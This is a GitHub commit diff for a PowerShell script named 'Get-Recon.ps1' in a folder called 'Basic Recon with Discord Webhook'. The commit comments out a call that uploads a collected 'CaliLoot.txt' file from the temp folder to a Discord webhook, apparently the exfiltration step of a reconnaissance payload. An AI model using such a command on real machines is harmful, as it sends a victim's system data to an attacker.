Skip to content

Commit b42f116

Browse files
authored
Update Get-Recon.ps1
1 parent 134e1b6 commit b42f116

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

Basic Recon with Discord Webhook/Get-Recon.ps1

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -80,6 +80,6 @@ function Upload-Discord {
8080
}
8181
}
8282

83-
Get-Recon
83+
#Get-Recon
8484

85-
Upload-Discord -webhookUrl 'YOUR DISCORD WEBHOOK HERE' -file "$env:TEMP\CaliLoot.txt" | Out-Null
85+
#Upload-Discord -webhookUrl 'YOUR DISCORD WEBHOOK HERE' -file "$env:TEMP\CaliLoot.txt" | Out-Null

0 commit comments

Comments
 (0)